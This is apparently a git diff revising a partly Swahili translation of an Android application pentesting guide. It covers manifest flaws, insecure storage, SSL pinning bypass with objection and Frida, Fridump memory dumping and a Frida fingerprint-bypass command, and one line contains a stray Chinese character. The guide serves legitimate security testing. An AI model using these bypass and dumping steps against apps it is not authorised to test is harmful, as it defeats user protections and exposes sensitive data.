uchambuzi wa dinamik** ambao utawasilishwa. Hivyo, **weka daima katika akili uwezekano huu**. +Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **habari zilizofichwa** (labda nywila au bendera zilizofichwa vizuri). Hivyo, inaweza kuwa ya kuvutia decompile apk, kubadilisha msimbo na kuirekebisha.\ +[**Katika tutorial hii** unaweza **kujifunza jinsi ya decompile na APK, kubadilisha msimbo wa Smali na kuirekebisha APK** na kazi mpya](smali-changes.md). Hii inaweza kuwa ya manufaa kama **mbadala kwa majaribio kadhaa wakati wa uchambuzi wa dynamic** ambao utawasilishwa. Hivyo, **weka daima katika akili uwezekano huu**. -## Njia nyingine za kuvutia +## Other interesting tricks -* [Kudanganya eneo lako katika Play Store](spoofing-your-location-in-play-store.md) +* [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md) * **Pakua APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd) -* Toa APK kutoka kifaa: +* Extract APK from device: ```bash adb shell pm list packages com.android.insecurebankv2 @@ -92,20 +92,20 @@ Lipa kipaumbele maalum kwa **firebase URLs** na angalia kama imewekwa vibaya. [T **Udhaifu** ulioainishwa kutoka kwa **Manifest.xml** ni pamoja na: -* **Programu zinazoweza kufanyiwa uchambuzi**: Programu zilizowekwa kama debuggable (`debuggable="true"`) katika faili la _Manifest.xml_ zina hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha matumizi mabaya. Kwa ufahamu zaidi kuhusu jinsi ya kutumia programu zinazoweza kufanyiwa uchambuzi, rejelea mafunzo juu ya kutafuta na kutumia programu zinazoweza kufanyiwa uchambuzi kwenye kifaa. -* **Mipangilio ya Nakala**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoruhusiwa za data kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa. +* **Programu zinazoweza kudhibitiwa**: Programu zilizowekwa kama zinazoweza kudhibitiwa (`debuggable="true"`) katika faili la _Manifest.xml_ zina hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha matumizi mabaya. Kwa ufahamu zaidi kuhusu jinsi ya kutumia programu zinazoweza kudhibitiwa, rejelea mafunzo juu ya kutafuta na kutumia programu zinazoweza kudhibitiwa kwenye kifaa. +* **Mipangilio ya Nakala**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoidhinishwa za data kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa. * **Usalama wa Mtandao**: Mipangilio ya usalama wa mtandao ya kawaida (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama vile pini za cheti na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa maeneo maalum. * **Shughuli na Huduma Zilizotolewa**: Kutambua shughuli na huduma zilizotolewa katika manifest kunaweza kuonyesha vipengele ambavyo vinaweza kutumika vibaya. Uchambuzi zaidi wakati wa upimaji wa nguvu unaweza kufichua jinsi ya kutumia vipengele hivi. -* **Watoa Maudhui na Watoa Faili**: Watoa maudhui walio wazi wanaweza kuruhusu ufikiaji usioruhusiwa au mabadiliko ya data. Mipangilio ya Watoa Faili pia inapaswa kuchunguzwa. -* **Vipokezi vya Matangazo na Mipango ya URL**: Vipengele hivi vinaweza kutumika kwa matumizi mabaya, huku kukiwa na umakini maalum juu ya jinsi mipango ya URL inavyosimamiwa kwa udhaifu wa ingizo. -* **Toleo la SDK**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikisisitiza umuhimu wa kutosupport toleo la zamani la Android lenye udhaifu kwa sababu za usalama. +* **Watoa Maudhui na Watoa Faili**: Watoa maudhui walio wazi wanaweza kuruhusu ufikiaji usioidhinishwa au mabadiliko ya data. Mipangilio ya Watoa Faili pia inapaswa kuchunguzwa. +* **Vipokezi vya Matangazo na Mipango ya URL**: Vipengele hivi vinaweza kutumika kwa matumizi mabaya, huku kukiwa na umakini maalum kuhusu jinsi mipango ya URL inavyosimamiwa kwa udhaifu wa ingizo. +* **Toleo la SDK**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikisisitiza umuhimu wa kutosimamia toleo la zamani la Android lenye udhaifu kwa sababu za usalama. Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama funguo za API, mipango ya kawaida, na maelezo mengine ya waendelezaji yanaweza kugundulika, yakisisitiza hitaji la ukaguzi wa makini wa rasilimali hizi. ### Tapjacking -**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha wazi programu ya mwathirika, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\ -Kwa hivyo, inafanya **mtumiaji kuwa kipofu kwa kujua kwamba kwa kweli wanatekeleza vitendo kwenye programu ya mwathirika**. +**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha wazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\ +Kwa kweli, inamfanya **mtumiaji asijue kwamba anafanya vitendo kwenye programu ya mwathirika**. Pata taarifa zaidi katika: @@ -127,12 +127,12 @@ Taarifa zaidi katika: **Hifadhi ya Ndani** -Katika Android, faili **zilizohifadhiwa** katika **hifadhi ya ndani** zime **kusudiwa** kuwa **zinapatikana** pekee na **programu** iliyozitengeneza. Kipimo hiki cha usalama kinadhibitiwa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia njia kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` ili **kuruhusu** faili kushirikiwa kati ya programu tofauti. Hata hivyo, njia hizi **hazizuii ufikiaji** wa faili hizi na programu nyingine, ikiwa ni pamoja na zile zenye nia mbaya. +Katika Android, faili **zilizohifadhiwa** katika **hifadhi ya ndani** zime **kusudiwa** kuwa **zinapatikana** pekee na **programu** iliyozitengeneza. Kipimo hiki cha usalama kinadhibitiwa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia njia kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` ili **kuruhusu** faili **kushirikiwa** kati ya programu tofauti. Hata hivyo, njia hizi **hazizuii ufikiaji** wa faili hizi na programu nyingine, ikiwa ni pamoja na zile zenye hatari. 1. **Uchambuzi wa Kawaida:** -* **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Njia hizi **zinaweza kufichua** faili kwa **ufikiaji usiotarajiwa au usioruhusiwa**. +* **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Njia hizi **zinaweza kufichua** faili kwa **ufikiaji usioidhinishwa au usiotarajiwa**. 2. **Uchambuzi wa Kijamii:** -* **Thibitisha** **idhini** zilizowekwa kwenye faili zilizotengenezwa na programu. Kwa haswa, **angalia** kama faili yoyote ime **wekwa kuwa inasomeka au kuandikwa duniani kote**. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, **kusoma au kubadilisha** faili hizi. +* **Thibitisha** **idhini** zilizowekwa kwenye faili zilizotengenezwa na programu. Kwa haswa, **angalia** kama faili yoyote ime **wekwa kuwa inasomeka au kuandikwa duniani kote**. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au kusudi, **kusoma au kubadilisha** faili hizi. **Hifadhi ya Nje** @@ -144,9 +144,9 @@ Wakati wa kushughulikia faili kwenye **hifadhi ya nje**, kama vile Kadi za SD, t * Kwa kuzingatia urahisi wa ufikiaji, inashauriwa **kutohifadhi taarifa nyeti** kwenye hifadhi ya nje. * Hifadhi ya nje inaweza kuondolewa au kufikiwa na programu yoyote, na kufanya kuwa na usalama mdogo. 3. **Kushughulikia Data kutoka Hifadhi ya Nje**: -* Daima **fanya uthibitisho wa ingizo** kwenye data iliyopatikana kutoka hifadhi ya nje. Hii ni muhimu kwa sababu data hiyo inatoka kwenye chanzo kisichotegemewa. -* Kuhifadhi executable au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa nguvu kunakataliwa vikali. -* Ikiwa programu yako inapaswa kupata faili za executable kutoka hifadhi ya nje, hakikisha faili hizi zime **sainiwa na kuthibitishwa kwa njia ya kisasa** kabla ya kupakiwa kwa nguvu. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako. +* Daima **fanya uthibitisho wa ingizo** kwenye data iliyopatikana kutoka hifadhi ya nje. Hii ni muhimu kwa sababu data hiyo inatoka kwenye chanzo kisichoaminika. +* Kuhifadhi faili za kutekeleza au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa nguvu kunakataliwa vikali. +* Ikiwa programu yako inapaswa kupata faili za kutekeleza kutoka hifadhi ya nje, hakikisha faili hizi **zimepangwa na kuthibitishwa kwa njia ya kisasa** kabla ya kupakiwa kwa nguvu. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako. Hifadhi ya nje inaweza **kupatikana** katika `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard` @@ -172,21 +172,21 @@ A good way to test this is to try to capture the traffic using some proxy like B ### Broken Cryptography -**Mchakato Duni za Usimamizi wa Funguo** +**Poor Key Management Processes** -Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa funguo zilizowekwa kwa ngumu/kupatikana kwa urahisi katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri. +Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa kutumia funguo zilizowekwa kwa nguvu/kutabirika katika msimbo. Hii haipaswi kufanywa kwani baadhi ya kurudi nyuma kunaweza kuruhusu washambuliaji kutoa taarifa za siri. -**Matumizi ya Algorithms zisizo Salama na/au Zilizopitwa na Wakati** +**Use of Insecure and/or Deprecated Algorithms** -Wakandarasi hawapaswi kutumia **algorithms zilizopitwa na wakati** kufanya **ukaguzi wa mamlaka**, **hifadhi** au **kutuma** data. Baadhi ya hizi algorithms ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazopinga **brute-force** zinapaswa kutumika na chumvi. +Wakandarasi hawapaswi kutumia **algorithms zilizopitwa na wakati** kufanya **muhimu** **kuangalia**, **hifadhi** au **tuma** data. Baadhi ya hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazostahimili **brute-force** zinapaswa kutumika na chumvi. ### Other checks -* It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers. -* If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence. -* If the app is sensitive (like bank apps), it should check if an **emulator** is being used. -* If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified. -* Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK +* Ni mapendekezo **kuficha APK** ili kufanya kazi ya mhandisi wa kurudi kuwa ngumu kwa washambuliaji. +* Ikiwa programu ni nyeti (kama programu za benki), inapaswa kufanya **kuangalia mwenyewe kuona kama simu imejizoa** na kuchukua hatua. +* Ikiwa programu ni nyeti (kama programu za benki), inapaswa kuangalia kama **emulator** inatumika. +* Ikiwa programu ni nyeti (kama programu za benki), inapaswa **kuangalia uadilifu wake kabla ya kutekeleza** ili kuangalia kama imebadilishwa. +* Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia ni compiler/packer/obfuscator gani ilitumika kujenga APK ### React Native Application @@ -239,7 +239,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -311,7 +311,7 @@ You need to activate the **debugging** options and it will be cool if you can ** **Logging** -Wakandarasi wanapaswa kuwa makini na kufichua **taarifa za ufuatiliaji** hadharani, kwani inaweza kusababisha uvujaji wa data nyeti. Zana [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa ajili ya kufuatilia kumbukumbu za programu ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wa matumizi na ueleweka. +Wakandarasi wanapaswa kuwa makini na kufichua **taarifa za ufuatiliaji** hadharani, kwani inaweza kusababisha uvujaji wa data nyeti. Zana [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa ajili ya kufuatilia kumbukumbu za programu ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wa matumizi na usomaji. {% hint style="warning" %} Note that from **later newer than Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs.\ @@ -320,7 +320,7 @@ Anyway, it's still recommended to **not log sensitive information**. **Copy/Paste Buffer Caching** -Mfumo wa **clipboard-based** wa Android unaruhusu kazi za kunakili na kubandika katika programu, lakini unatoa hatari kwani **programu nyingine** zinaweza **kupata** clipboard, na hivyo kufichua data nyeti. Ni muhimu **kuondoa kazi za kunakili/kubandika** kwa sehemu nyeti za programu, kama vile maelezo ya kadi ya mkopo, ili kuzuia uvujaji wa data. +Mfumo wa **clipboard-based** wa Android unaruhusu kazi ya kunakili-na-kut粘 katika programu, lakini unatoa hatari kwani **programu nyingine** zinaweza **kupata** clipboard, na hivyo kufichua data nyeti. Ni muhimu **kuondoa kazi za kunakili/kut粘** kwa sehemu nyeti za programu, kama vile maelezo ya kadi ya mkopo, ili kuzuia uvujaji wa data. **Crash Logs** @@ -328,9 +328,9 @@ Ikiwa programu **inasambaratika** na **kuhifadhi kumbukumbu**, kumbukumbu hizi z Kama pentester, **jaribu kuangalia kumbukumbu hizi**. -**Data za Uchambuzi Zinatumwa kwa Vyama vya Tatu** +**Analytics Data Sent To 3rd Parties** -Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usio sahihi na wakandarasi. Ili kubaini uvujaji wa data, ni vyema **kuingilia kati trafiki ya programu** na kuangalia ikiwa kuna taarifa nyeti zinazotumwa kwa huduma za vyama vya tatu. +Programu mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza bila kukusudia **kuvuja data nyeti** kutokana na utekelezaji usiofaa na wakandarasi. Ili kubaini uvujaji wa data, ni vyema **kuingilia trafiki ya programu** na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za upande wa tatu. ### SQLite DBs @@ -364,7 +364,7 @@ You can also start an exported activity from adb: ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` -**NOTE**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu katika toleo za zamani (API versions < 21). +**KUMBUKA**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika shughuli, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), kwa wazi hii ni hatari tu katika toleo za zamani (API versions < 21). {% hint style="info" %} Kumbuka kwamba kupita kwa idhini si kila wakati udhaifu, itategemea jinsi kupita kunavyofanya kazi na ni taarifa gani zinazoonyeshwa. @@ -431,7 +431,7 @@ Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye shughuli inayoitw **Taarifa nyeti** -Kila wakati unapotafuta deeplink hakikisha kuwa **haipati data nyeti (kama nywila) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kujifanya kuwa deeplink na kuiba data hiyo!** +Kila wakati unapata deeplink hakikisha kuwa **haipati data nyeti (kama nywila) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kujifanya kuwa deeplink na kuiba data hiyo!** **Vigezo katika njia** @@ -442,57 +442,57 @@ Kumbuka kwamba ikiwa utapata mwisho sahihi ndani ya programu unaweza kuwa na uwe Ripoti ya [bug bounty ya kuvutia](https://hackerone.com/reports/855618) kuhusu viungo (_/.well-known/assetlinks.json_). -### Ukaguzi wa Safu ya Usafirishaji na Kushindwa kwa Uthibitishaji +### Ukaguzi wa Safu ya Usafiri na Kushindwa kwa Uthibitishaji * **Vyeti havikaguliwi kila wakati ipasavyo** na programu za Android. Ni kawaida kwa programu hizi kupuuza onyo na kukubali vyeti vilivyojitegemea au, katika baadhi ya matukio, kurudi kutumia muunganisho wa HTTP. -* **Majadiliano wakati wa mkono wa SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Uthibitisho huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), ikiruhusu washambuliaji kufungua data. -* **Kuvuja kwa taarifa binafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile vidakuzi vya kikao au maelezo ya mtumiaji, kutokana na kukamatwa na viumbe wabaya. +* **Majadiliano wakati wa handshake ya SSL/TLS wakati mwingine ni dhaifu**, yakitumia cipher suites zisizo salama. Uthibitisho huu unafanya muunganisho uwe hatarini kwa mashambulizi ya mtu katikati (MITM), kuruhusu washambuliaji kufungua data. +* **Kuvuja kwa taarifa binafsi** ni hatari wakati programu zinathibitisha kwa kutumia njia salama lakini kisha kuwasiliana kupitia njia zisizo salama kwa shughuli nyingine. Njia hii inashindwa kulinda data nyeti, kama vile vidakuzi vya kikao au maelezo ya mtumiaji, kutokana na kukamatwa na wahalifu. #### Uthibitishaji wa Cheti -Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uthibitishwe ili kuimarisha usalama. Hii ni muhimu kwa sababu usanidi usio salama wa TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina. +Tutazingatia **uthibitishaji wa cheti**. Uadilifu wa cheti cha seva lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu usanidi usio salama wa TLS na uhamasishaji wa data nyeti kupitia njia zisizo na usalama zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya seva na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo wa kina. #### SSL Pinning -SSL Pinning ni hatua ya usalama ambapo programu inathibitisha cheti cha seva dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya programu yenyewe. Njia hii ni muhimu kwa kuzuia mashambulizi ya MITM. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa programu zinazoshughulikia taarifa nyeti. +SSL Pinning ni kipimo cha usalama ambapo programu inathibitisha cheti cha seva dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya programu yenyewe. Njia hii ni muhimu kwa kuzuia mashambulizi ya MITM. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa programu zinazoshughulikia taarifa nyeti. #### Ukaguzi wa Trafiki -Ili kukagua trafiki ya HTTP, ni muhimu **kusanidi cheti cha zana ya proxy** (mfano, Burp). Bila kusanidi cheti hii, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusanidi cheti ya CA ya kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine). +Ili kukagua trafiki ya HTTP, ni muhimu **kusanidi cheti cha zana ya proxy** (mfano, Burp). Bila kusanidi cheti hiki, trafiki iliyofichwa huenda isionekane kupitia proxy. Kwa mwongozo wa kusanidi cheti cha CA cha kawaida, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine). -Programu zinazolenga **API Level 24 na zaidi** zinahitaji marekebisho kwenye Usanidi wa Usalama wa Mtandao ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Usanidi wa Usalama wa Mtandao, [**rejelea mafunzo haya**](make-apk-accept-ca-certificate.md). +Programu zinazolenga **API Level 24 na juu** zinahitaji marekebisho kwenye Usanidi wa Usalama wa Mtandao ili kukubali cheti cha CA cha proxy. Hatua hii ni muhimu kwa kukagua trafiki iliyofichwa. Kwa maelekezo ya kubadilisha Usanidi wa Usalama wa Mtandao, [**rejelea mafunzo haya**](make-apk-accept-ca-certificate.md). #### Kupita SSL Pinning Wakati SSL Pinning inatekelezwa, kupita inakuwa muhimu ili kukagua trafiki ya HTTPS. Njia mbalimbali zinapatikana kwa kusudi hili: -* Kiotomatiki **badilisha** **apk** ili **kupita** SSLPinning na [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili, ni kwamba hutahitaji root ili kupita SSL Pinning, lakini utahitaji kufuta programu na kuisakinisha upya, na hii haitafanya kazi kila wakati. -* Unaweza kutumia **Frida** (iliyozungumziwa hapa chini) ili kupita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) +* Kiotomatiki **badilisha** **apk** ili **kupita** SSLPinning na [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida bora ya chaguo hili ni kwamba hutahitaji root ili kupita SSL Pinning, lakini utahitaji kufuta programu na kuisakinisha mpya, na hii haitafanya kazi kila wakati. +* Unaweza kutumia **Frida** (iliyajadiliwa hapa chini) kupita ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/) * Unaweza pia kujaribu **kupita kiotomatiki SSL Pinning** kwa kutumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"` -* Unaweza pia kujaribu **kupita kiotomatiki SSL Pinning** kwa kutumia **MobSF uchambuzi wa dynamic** (iliyofafanuliwa hapa chini) -* Ikiwa bado unafikiri kuna trafiki ambayo huwezi kukamata unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blog hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62) +* Unaweza pia kujaribu **kupita kiotomatiki SSL Pinning** kwa kutumia **uchambuzi wa dynamic wa MobSF** (ilielezwa hapa chini) +* Ikiwa bado unafikiri kuna trafiki ambayo hujapata unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blog hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62) #### Kutafuta Udhaifu wa Kawaida wa Mtandao -Ni muhimu pia kutafuta udhaifu wa kawaida wa mtandao ndani ya programu. Taarifa za kina juu ya kutambua na kupunguza udhaifu hizi ziko nje ya upeo wa muhtasari huu lakini zimefunikwa kwa kina mahali pengine. +Ni muhimu pia kutafuta udhaifu wa kawaida wa mtandao ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza udhaifu huu yapo nje ya upeo wa muhtasari huu lakini yanashughulikiwa kwa kina mahali pengine. ### Frida -[Frida](https://www.frida.re) ni zana ya uhandisi wa dynamic kwa waendelezaji, wahandisi wa kurudi nyuma, na watafiti wa usalama.\ -**Unaweza kufikia programu inayofanya kazi na kuunganisha mbinu wakati wa kukimbia kubadilisha tabia, kubadilisha thamani, kutoa thamani, kukimbia msimbo tofauti...**\ -Ikiwa unataka kufanya pentest kwenye programu za Android unahitaji kujua jinsi ya kutumia Frida. +[Frida](https://www.frida.re) ni zana ya uhandisi wa dynamic kwa ajili ya waendelezaji, wahandisi wa kurudi nyuma, na watafiti wa usalama.\ +**Unaweza kufikia programu inayofanya kazi na kuunganisha mbinu wakati wa wakati wa kukimbia kubadilisha tabia, kubadilisha thamani, kutoa thamani, kuendesha msimbo tofauti...**\ +Ikiwa unataka kufanya pentest kwa programu za Android unahitaji kujua jinsi ya kutumia Frida. * Jifunze jinsi ya kutumia Frida: [**Mafunzo ya Frida**](frida-tutorial/) * Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) * Ojection ni nzuri kwa kuharakisha matumizi ya Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon) -* Unaweza kupata baadhi ya scripts za Frida za kushangaza hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re) +* Unaweza kupata baadhi ya scripts za Frida hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re) * Jaribu kupita mitambo ya kupinga-debugging / kupinga-frida kwa kupakia Frida kama ilivyoonyeshwa katika [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (chombo [linjector](https://github.com/erfur/linjector-rs)) ### **Dump Memory - Fridump** -Angalia ikiwa programu inahifadhi taarifa nyeti ndani ya kumbukumbu ambayo haipaswi kuhifadhi kama nywila au maneno ya kukumbuka. +Angalia ikiwa programu inahifadhi taarifa nyeti ndani ya kumbukumbu ambayo haipaswi kuhifadhiwa kama nywila au maneno ya kukumbuka. -Kwa kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza dump kumbukumbu ya programu kwa: +Kwa kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza dump kumbukumbu ya programu na: ```bash # With PID python3 fridump3.py -u @@ -501,7 +501,7 @@ python3 fridump3.py -u frida-ps -Uai python3 fridump3.py -u "" ``` -Hii itatoa kumbukumbu katika folda ./dump, na humo unaweza kutumia grep na kitu kama: +Hii itatoa kumbukumbu katika folda ya ./dump, na humo unaweza kutumia grep na kitu kama: {% code overflow="wrap" %} ```bash @@ -521,7 +521,7 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js ``` ### **Fingerprint/Biometrics Bypass** -Kwa kutumia skripti ya Frida ifuatayo inaweza kuwa na uwezo wa **kuzidi uthibitisho wa alama za vidole** ambayo programu za Android zinaweza kufanya ili **kulinda maeneo fulani nyeti:** +Kwa kutumia skripti ya Frida ifuatayo inaweza kuwa inawezekana **kuzidi uthibitisho wa alama za vidole** ambayo programu za Android zinaweza kuwa zinafanya ili **kulinda maeneo fulani nyeti:** {% code overflow="wrap" %} ```bash @@ -537,7 +537,7 @@ Hata hivyo, ikiwa picha hii ina **habari nyeti**, mtu mwenye ufikiaji wa picha h Picha hizo kwa kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`** -Android inatoa njia ya **kuzuia upigaji picha wa skrini kwa kuweka kipimo cha FLAG\_SECURE**. Kwa kutumia bendera hii, maudhui ya dirisha yanachukuliwa kama salama, kuzuia kuonekana katika picha za skrini au kutazamwa kwenye onyesho lisilo salama. +Android inatoa njia ya **kuzuia upigaji picha wa skrini kwa kuweka kipimo cha FLAG\_SECURE**. Kwa kutumia bendera hii, maudhui ya dirisha yanachukuliwa kuwa salama, na kuzuia kuonekana katika picha za skrini au kuonekana kwenye onyesho lisilo salama. ```bash getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE); ``` @@ -549,14 +549,14 @@ Chombo hiki kinaweza kukusaidia kusimamia zana tofauti wakati wa uchambuzi wa dy Wak developers mara nyingi huunda vipengele vya proxy kama shughuli, huduma, na wapokeaji wa matangazo ambao hushughulikia hizi Intents na kuzipitisha kwa mbinu kama `startActivity(...)` au `sendBroadcast(...)`, ambayo inaweza kuwa hatari. -Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivyoweza kusambazwa au kufikia watoa maudhui nyeti kwa kuhamasisha hizi Intents. Mfano maarufu ni kipengele cha `WebView` kinachobadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuyatekeleza, ambayo yanaweza kusababisha uhamasishaji mbaya wa Intent. +Hatari iko katika kuruhusu washambuliaji kuanzisha vipengele vya programu visivyoweza kusambazwa au kufikia watoa maudhui nyeti kwa kuhamasisha hizi Intents. Mfano 